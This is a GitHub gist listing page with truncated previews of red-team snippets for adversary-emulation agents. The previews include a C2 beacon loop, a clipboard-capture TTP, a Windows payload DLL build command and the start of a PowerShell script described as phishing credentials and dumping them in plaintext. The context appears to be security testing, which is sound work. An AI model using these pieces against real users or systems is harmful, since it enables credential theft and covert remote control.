Alex khyberspache

@khyberspache
khyberspache / iam_policy.json
Created Oct 25, 2021
Simple Prelude EC2 IAM Policy
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "ec2:AuthorizeSecurityGroupIngress",
        "ec2:DescribeAddresses",
        "ec2:DescribeImages",
        "ec2:DescribeInstances",
khyberspache / hush_handle_api_task.js
Created Sep 3, 2021
Example of hush handling an API task
if (task[0] === 'api') {
  if (task[2]) {
    try {
      task[2] = JSON.parse(task[2]);
    } catch (e) {
      throw new Error("Could not parse module params: "+e.toString());
    }
  }
  return runModule(task[0], task[1], task[2] || null);
}
khyberspache / hush_run.js
Created Sep 3, 2021
Hush agent's main event loop
function run(argv) {
  beacon = new Beacon((argv.length > 0) ? (argv[0] || argv) : 'http://localhost:3391', (argv.length > 1) ? argv[1] : 'http');
  while (true) {
    try {
      let tasks = runModule('c2', beacon.contact, {beacon: beacon});
      beacon.Links = tasks.map(task => executeTask(Object.assign(new Instruction(), task, {Pid: beacon.pid})));
    } catch (e) {
      console.log(`Beacon failed. ${e}`)
    }
    console.log(`Sleeping for ${beacon.Sleep} seconds`);
khyberspache / commands_windows_example.go
Created Sep 3, 2021
Example CallNativeAPI implementation
package commands

import (
	"encoding/json"
	"log"
	"os"
	"syscall"
	"unsafe"
)
View api_keyword.yml
platforms:
  windows:
    keyword:
      command: api.ps
khyberspache / clipboard_module.yml
Last active Sep 3, 2021
Example PneumaEX module TTP
id: 2897b095-3356-456f-876c-3103f91352ab
metadata:
  version: 1
  authors:
    - khyberspache
  tags:
    - thinktank
name: Capture clipboard using a module
description: |
  Installs a user-land clipboard capture binary and collects the clipboard every 30 seconds for 10 minutes.
khyberspache / clipboard_module_ideal.yml
Created Sep 3, 2021
Example of what a good Keyword TTP would look like
platforms:
  darwin:
    keyword:
      command: collect.captureClipboard
khyberspache / Invoke-PromptForCredentials.ps1
Last active Jan 19, 2021
Prompt a user for credentials on Windows and dump in plaintext
$type=@"
using System;
using System.Text;
using System.Runtime.InteropServices;
public static class CredUI
{
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
    private struct CREDUI_INFO
khyberspache / build.sh
Created Jan 19, 2021
CGO build command for Windows DLL with 64-bit address ASLR and NX compatibility on
GOOS=windows CC=x86_64-w64-mingw32-gcc CGO_ENABLED=1 go build --buildmode=c-shared --ldflags='-s -w -X main.key="MYKEYISBESTKEY" -extldflags "-Wl,--nxcompat -Wl,--dynamicbase -Wl,--high-entropy-va"' -o payloads/pneuma.dll main.go;
khyberspache / main.go
Created Jan 19, 2021
Example main.go for pneuma to compile into a shared library with an exported function on Windows
//+build cgo

package main

import "C"

import (
	"flag"
	"github.com/preludeorg/pneuma/sockets"
	"github.com/preludeorg/pneuma/util"
	"log"